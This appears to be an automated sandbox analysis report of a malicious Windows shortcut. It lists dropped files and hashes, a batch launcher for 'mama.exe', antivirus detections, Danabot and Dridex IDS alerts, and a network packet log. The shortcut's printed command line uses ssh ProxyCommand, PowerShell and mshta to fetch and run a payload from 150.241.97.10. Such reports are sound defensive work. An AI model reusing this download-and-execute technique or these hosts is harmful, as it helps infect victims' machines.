                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                      MD5:3A49135134665364308390AC398006F1
                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                      Category:dropped
                                                                      Size (bytes):386528
                                                                      Entropy (8bit):7.9736851559892425
                                                                      Encrypted:false
                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                      Category:dropped
                                                                      Size (bytes):1419751
                                                                      Entropy (8bit):7.976496077007677
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/ewYIGNPhmOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:GwZG3bWLxBGZN3mlind9i4ufFXpAXkru
                                                                      MD5:49B6EBA4436ED24E5352E7E7B99E7F24
                                                                      SHA1:284FA9437DDF60C3F4B345A52057DAAD6771E572
                                                                      SHA-256:1D65C0CFD6A2B7AF7FBBFBB4977F69CE61053C4F3D6B6F2D5D371FDF4A0D024D
                                                                      SHA-512:49CCCC0EEAAE481D5A53AB0C5E7504B0A3ECAC406E0626540C4BA5E13F5A7A8ED11E676572DB3BFFC015FD60702D9ED192FED65D2D16112934E53155EEA0BCB7
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):150
                                                                      Entropy (8bit):4.93838834787619
                                                                      Encrypted:false
                                                                      SSDEEP:3:CxKbbYx32/r4lwxQVLX65RSvWKTn0nacwREaKC5WjvdMRSvy:Cx+bYc/gwa+5UvrncNwiaZ5QFMUvy
                                                                      MD5:C6247F2A11070E648EBC86DE79468597
                                                                      SHA1:ECC3825B821B01CF1F0ED118D88BD5CD0D82C63E
                                                                      SHA-256:B07DD04040A2D4808D9003D884FEBA52CD43D508046BAACCA07FDBB753F12197
                                                                      SHA-512:4911BF7866C1A35FBF3650B5968970FF3DA800E8A4A03D9BC4609615323A0CAA76D306E9ADFD3A094BB81AB6402CC12E131B44998A0911AA05AC8C4FC3B0A176
                                                                      Malicious:true
                                                                      Preview:if not DEFINED IS_MNMZD set IS_MNMZD=1 && start "" /min "%~dpnx0" %* && exit ..start /min C:\Users\user\AppData\Roaming\mama.exe && exit ..exit..
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6225
                                                                      Entropy (8bit):3.7520878012178533
                                                                      Encrypted:false
                                                                      SSDEEP:48:Vv2Qb+2C3U20DaukvhkvklCywg26nxPl6wSogZoRJ7JaW6nxPlJwSogZoRJ7JO1:wQq2Ckr3kvhkvCCtD6nxPYH86nxPhHP
                                                                      MD5:9267231D0E6AFA9B4EEE244E20C55FAF
                                                                      SHA1:B41F71F914FB29F35EEE967EA7337805E37CAB87
                                                                      SHA-256:8515789EABE6C68244D75C8B99182791763F96980E16E071F2A4D9E230DC609E
                                                                      SHA-512:3F53C4575628A9B4DC3A7111DEE0C65AF3791ED5E6A594091605EA5AA281C03D5D7D66C2C1F2A1CF5E4F69EC48D58B76C28F5C814C21E9FA9315816F9107D828
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6225
                                                                      Entropy (8bit):3.7520878012178533
                                                                      Encrypted:false
                                                                      SSDEEP:48:Vv2Qb+2C3U20DaukvhkvklCywg26nxPl6wSogZoRJ7JaW6nxPlJwSogZoRJ7JO1:wQq2Ckr3kvhkvCCtD6nxPYH86nxPhHP
                                                                      MD5:9267231D0E6AFA9B4EEE244E20C55FAF
                                                                      SHA1:B41F71F914FB29F35EEE967EA7337805E37CAB87
                                                                      SHA-256:8515789EABE6C68244D75C8B99182791763F96980E16E071F2A4D9E230DC609E
                                                                      SHA-512:3F53C4575628A9B4DC3A7111DEE0C65AF3791ED5E6A594091605EA5AA281C03D5D7D66C2C1F2A1CF5E4F69EC48D58B76C28F5C814C21E9FA9315816F9107D828
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PDF document, version 1.4, 6 pages
                                                                      Category:dropped
                                                                      Size (bytes):1348011
                                                                      Entropy (8bit):7.644353784937569
                                                                      Encrypted:false
                                                                      SSDEEP:24576:RpALBW4Dw5KYgPDgbECYMz50vXxkRAJbeDfTnUxGnnlv:kBW4MKYgcBYMzCvSUqDfzomlv
                                                                      MD5:8BB097B11BDAA4AD387D7E648712D4D3
                                                                      SHA1:70B3BEC7D52D13548EEE3B71E748C6C3D011F8C3
                                                                      SHA-256:F42E4CB924D4B8023827477FB136664A8426CB5AA208660288F4278CD523A5A4
                                                                      SHA-512:6F929BB7FD157750D1F152C5837344CA20FE6A51284F58305AB1D5D2F067859C5EA0AC5FAD6AE4514654A112F49214D359DB5522FE416A138B4004088DF423D9
                                                                      Malicious:false
                                                                      Preview:%PDF-1.4.%.....1 0 obj.<<./CreationDate(D:20240222130353+05'00')./Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))./Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\)).>>.endobj.2 0 obj.<<./Type/Catalog./Pages 3 0 R./Metadata 23 0 R.>>.endobj.3 0 obj.<<./Type/Pages./Count 6./Kids[4 0 R 8 0 R 11 0 R 14 0 R 17 0 R 20 0 R].>>.endobj.4 0 obj.<<./Type/Page./MediaBox[0 0 595.08 841.68]./Parent 3 0 R./Contents 5 0 R./Resources.<<./ProcSet [/PDF/Text/ImageB/ImageC/ImageI]./ExtGState.<<./GS0 6 0 R.>>./XObject.<<./I0 7 0 R.>>.>>./Group.<<./CS/DeviceRGB./S/Transparency.>>.>>.endobj.5 0 obj.<<./Length 56./Filter/FlateDecode.>>.stream.x.+.*.2P...t.}.`...b.B.SKS=...............i..........F...endstream.endobj.6 0 obj.<<./Type/ExtGState./ca 1.>>.endobj.7 0 obj.<<./Type/XObject./Subtype/Image./Length 123720./Filter/DCTDecode./Interpolate true./Width 1653./Height 2338./BitsPerComponent 8./ColorSpace/DeviceRGB.>>.stream.......JFIF..............Exif..MM.*.............................u..........."...........
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):4277248
                                                                      Entropy (8bit):7.796835542143392
                                                                      Encrypted:false
                                                                      SSDEEP:98304:h+Dc6yHfpXZa1ZUVTZ2zsFi840WiRoYIUF4ZxStM3bQR:w9ylZIUVt2zd8rnH4jStM3bg
                                                                      MD5:72B6B07175EF611CE7DAA959A1248AAE
                                                                      SHA1:BEE9D33D83C98A7C2C3C9D0EB671FA1D53328378
                                                                      SHA-256:8E6AE3B356D2205296FEC0761DAA461A311190E50E0E611699EBB4AAD6E6CD77
                                                                      SHA-512:56F0EE5BA99A55F05BFEA0252B544D6DCAC6CC22DBF430E228BABD1520A14EA76429FCC8F67BCC0425F8D573211A1D1B47BA6164C136D8C2A85A26030CAE9F52
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                      Joe Sandbox View:
                                                                      • Filename: vreFmptfUu.lnk, Detection: malicious
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....9ig..................>..f........>.......>...@...........................B..................@....................@.......?.......A..6...................0@.............................. @.......................?.d.....?.x....................text.....>.......>................. ..`.itext..P.....>.......>............. ..`.data...h}....>..~....>.............@....bss....._...p?..........................idata........?......\?.............@....didata.x.....?......t?.............@....edata........@......x?.............@..@.tls.... .....@..........................rdata..\.... @......z?.............@..@.reloc.......0@......|?.............@..B.rsrc....6....A..6....A.............@..@..............B......DA.............@..@................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                      Entropy (8bit):2.660049738252906
                                                                      TrID:
                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                      File name:A4FY1OA97K.lnk
                                                                      File size:2'408 bytes
                                                                      MD5:0306addb386436ae663da152bee03226
                                                                      SHA1:0c35bff3dafec0f21436b6db025a24e0102ce7b7
                                                                      SHA256:32a98d1b299d1feebb096cdeb38433013b7db6adf5d9923b539390d777bfac3f
                                                                      SHA512:b5508d380b65cc364d378f1ea69d33b9f4eed2f45b9cd48a4b13cd51e97d7e77eccf81516eca2b14229bfda80d05277693a03093ea7f553db88c78946bc718f7
                                                                      SSDEEP:24:8Ayj/BF//Z/U9p+/+GzmWbUk7KxZlEhSdd79dsHdUM:8ZLZwRGzmaUkuPltdJ9NM
                                                                      TLSH:AC4156442EEA0322F3B38EB544BAA621C43FBC16DE755F1D008D52482727614E575F7B
                                                                      File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                      Icon Hash:72d282828e8d8dd5

                                                                      General

                                                                      Relative Path:..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                                      Command Line Argument: -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
                                                                      Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp                       | SID     | Signature                                        | Severity | Source IP   | Source Port | Dest IP         | Dest Port | Protocol
2024-12-27T09:05:12.520857+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex         | 3        | 192.168.2.7 | 49699       | 150.241.97.10   | 443       | TCP
2024-12-27T09:05:28.138283+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3        | 192.168.2.7 | 49731       | 150.241.97.10   | 443       | TCP
2024-12-27T09:06:42.110836+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49903       | 188.132.183.159 | 443       | TCP
2024-12-27T09:06:43.310390+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49908       | 206.206.125.221 | 443       | TCP
2024-12-27T09:06:44.453950+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49912       | 94.131.118.216  | 443       | TCP
2024-12-27T09:06:45.582391+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49915       | 188.132.183.159 | 443       | TCP
2024-12-27T09:06:53.596487+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49939       | 188.132.183.159 | 443       | TCP
2024-12-27T09:06:55.532704+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49942       | 206.206.125.221 | 443       | TCP
2024-12-27T09:06:56.636525+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49947       | 94.131.118.216  | 443       | TCP
2024-12-27T09:06:57.744654+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49949       | 188.132.183.159 | 443       | TCP
2024-12-27T09:07:03.248647+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49968       | 188.132.183.159 | 443       | TCP
2024-12-27T09:07:03.338643+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49969       | 206.206.125.221 | 443       | TCP
2024-12-27T09:07:03.422521+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49970       | 94.131.118.216  | 443       | TCP
2024-12-27T09:07:03.509957+0100 | 2034465 | ET MALWARE Danabot Key Exchange Request          | 1        | 192.168.2.7 | 49971       | 188.132.183.159 | 443       | TCP
Timestamp                           | Source Port | Dest Port | Source IP     | Dest IP
Dec 27, 2024 09:05:10.954016924 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:10.954073906 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:10.954176903 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:11.012916088 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:11.012945890 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:12.520756960 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:12.520857096 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:12.849004984 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:12.849046946 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:12.849422932 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:12.849559069 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:12.851341009 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:12.895337105 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.341161013 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.341192007 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.341226101 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.341239929 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.341255903 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.341300011 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.465034008 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.465107918 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.515947104 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.516047955 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.537620068 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.537853003 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.564196110 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.564341068 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.598954916 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.599035025 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.711157084 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.711364031 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.720499039 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
Dec 27, 2024 09:05:13.720575094 CET | 49699       | 443       | 192.168.2.7   | 150.241.97.10
Dec 27, 2024 09:05:13.730010986 CET | 443         | 49699     | 150.241.97.10 | 192.168.2.7
                                                                      Dec 27, 2024 09:05:13.730087996 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.742650986 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.742739916 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.752412081 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.752477884 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.761204004 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.761284113 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.836247921 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.836322069 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.845732927 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.845805883 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.917376041 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.917444944 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.926594973 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.926670074 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.937700987 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.937781096 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.945992947 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.946054935 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.954412937 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.954474926 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.960567951 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.960685015 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.968494892 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.968564987 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.974666119 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.974737883 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.981333971 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.981410027 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.988684893 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.988754034 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.994684935 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.994751930 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.005930901 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.006007910 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.012057066 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.012136936 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.127116919 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.127204895 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.131294966 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.131366968 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.136679888 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.136749983 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.140702963 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.140769958 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.144812107 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.144881010 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.150098085 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.150162935 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.154144049 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.154220104 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.158272982 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.158334970 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.162362099 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.162426949 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.167566061 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.167630911 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.171412945 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.171475887 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.192493916 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.192564011 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.196603060 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.196677923 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.200665951 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.200735092 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.214194059 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.214257002 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.218368053 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.218430996 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.337610006 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.337690115 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.341712952 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.341784954 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.345737934 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.345809937 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.350874901 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.350938082 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.354840994 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.354906082 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.358891010 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.358968019 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.362858057 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.362935066 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.367989063 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.368065119 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.371963978 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.372030973 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.375947952 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.376013994 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.380551100 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.380620003 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.402441025 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.402523994 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.405654907 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.405742884 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.410850048 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.410909891 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.424001932 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.424083948 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.427243948 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.427304029 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.547508955 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.547583103 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.550961018 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.551027060 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.554932117 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.554997921 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556191921 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556265116 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556278944 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556294918 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556313992 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556341887 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556369066 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556386948 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556394100 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556685925 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.170782089 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.170820951 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:21.170890093 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.180223942 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.180238008 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.671564102 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.671650887 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:22.700272083 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:22.700324059 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.700643063 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.712353945 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:22.755338907 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.252818108 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.252846956 CET44349719150.241.97.10192.168.2.7
